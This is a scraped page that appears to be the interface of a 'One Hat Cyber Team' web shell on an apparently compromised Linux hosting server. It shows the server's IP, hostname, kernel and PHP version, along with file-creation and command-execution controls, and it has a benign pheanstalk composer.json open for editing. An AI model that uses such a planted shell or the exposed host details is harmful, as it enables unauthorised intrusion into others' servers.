One Hat Cyber Team
Your IP :
216.73.217.131
Server IP :
185.33.55.30
Server :
Linux cl30.webspacecontrol.com 5.14.0-611.38.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 10 17:21:28 EDT 2026 x86_64
Server Software :
Apache
PHP Version :
8.1.34
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
opt
/
cxs2
/
vendor
/
pda
/
pheanstalk
/
Edit File:
composer.json
{ "name": "pda/pheanstalk", "type": "library", "description": "PHP client for beanstalkd queue", "keywords": ["beanstalkd"], "homepage": "https://github.com/pheanstalk/pheanstalk", "license": "MIT", "authors": [ { "name": "Paul Annesley", "email": "paul@annesley.cc", "homepage": "http://paul.annesley.cc/", "role": "Developer" }, { "name": "Sam Mousa", "email": "sam@mousa.nl", "role": "Maintainer" } ], "require": { "php": ">=7.1.0", "ext-mbstring": "*" }, "require-dev": { "phpunit/phpunit": "^7" }, "autoload": { "psr-4": { "Pheanstalk\\": "src/" } }, "scripts": { "phpunit": "docker-compose run --rm phpunit", "psalm": "@php vendor/bin/psalm --show-info=false src", "test": [ "@composer install", "@phpunit" ] } }
Simpan